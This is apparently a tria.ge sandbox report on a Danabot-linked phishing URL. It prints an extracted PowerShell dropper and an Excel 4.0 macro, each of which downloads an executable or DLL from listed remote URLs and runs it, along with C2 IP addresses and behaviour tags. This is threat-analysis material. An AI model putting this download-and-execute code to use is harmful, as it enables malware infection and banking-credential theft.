Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

https://megascratchr...

windows10-2004-x64

Sharing

Copy URL
Twitter E-mail

General

  • Target

    https://megascratchrewards.com/?utm_source=pop&utm_medium=111111.111111_111111

  • Sample

    250125-sxsn9azqej

Score
10/10
danabotbankerdiscoveryexecutionpersistencetrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$jrfha0 = "Wf1rHz"
2
$uummli = "284"
3
$ibtj49n = "ThMqW8s0"
4
$fwcajs6 = $env:userprofile + "\\" + $uummli + ".exe"
5
$s9gzrstm = "EFCwnlGz"
6
$u8uar3 = new-object net.webclient
7
$pljbqine = "http://blockchainjoblist.com/wp-admin/014080/", "https://womenempowermentpakistan.com/wp-admin/paba5q52/", "https://atnimanvilla.com/wp-content/073735/", "https://yeuquynhnhai.com/upload/41830/", "https://deepikarai.com/js/4bzs6/"
8
$l4sjlogw = "zISjEmiP"
9
foreach ($v3hepmmz in $pljbqine) {
10
try {
11
$u8uar3.downloadfile($v3hepmmz, $fwcajs6)
12
$ivhhwrib = "s5Ts_iP8"
13
if ((get-item $fwcajs6).length -ge 23931) {
14
[diagnostics.process]::start($fwcajs6)
15
$zdns8wi = "F3Wwo0"
16
break
17
$ttjptxb = "ijlWhCzP"
18
}
19
} catch {
20
}
URLs
exe.dropper

http://blockchainjoblist.com/wp-admin/014080/
exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/
exe.dropper

https://atnimanvilla.com/wp-content/073735/
exe.dropper

https://yeuquynhnhai.com/upload/41830/
exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Language
xlm4.0
Source
1
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\nxTgTGh", 0)
2
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\nxTgTGh\ECeMdPT", 0)
3
=CALL("URLMON", "URLDownloadToFileA", "JCCJJ", 0, "https://erpoweredent.at/3/zte.dll", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll", 0, 0)
4
=CALL("INSENG", "DownloadFile", "CCJ", "https://erpoweredent.at/3/zte.dll", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll", 1)
5
=CALL("Shell32", "ShellExecuteA", "JCCCCJ", 0, "Open", "rundll32.exe", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer", "0", 0)
URLs
xlm40.dropper

https://erpoweredent.at/3/zte.dll

Extracted

Family

danabot

C2

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204
rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCyJo2aXOQNP+KeAnWlpOiuMk5W
3
l1An5GorPHqEyFAlRyv6sEylQDjAuSLGsy2LCvKmuzx2AFQ+3IMfqFf3JacY1HmY
4
WuiL1V+R910TohM+6hnLnWx7JNbfzB3S7D1JC/WNUwlVv5NnIIX1i+zIW5BTanU1
5
yQ97xjvokjvZHCHe2wIDAQAB
6
-----END PUBLIC KEY-----

Targets

    • Target

      https://megascratchrewards.com/?utm_source=pop&utm_medium=111111.111111_111111

    Score
    10/10
    danabotbankerdiscoveryexecutionpersistencetrojan

    • Danabot

      Danabot is a modular banking Trojan that has been linked with other malware.

      trojanbankerdanabot

    • Danabot family

      danabot

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Probable phishing domain

    behavioral1

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.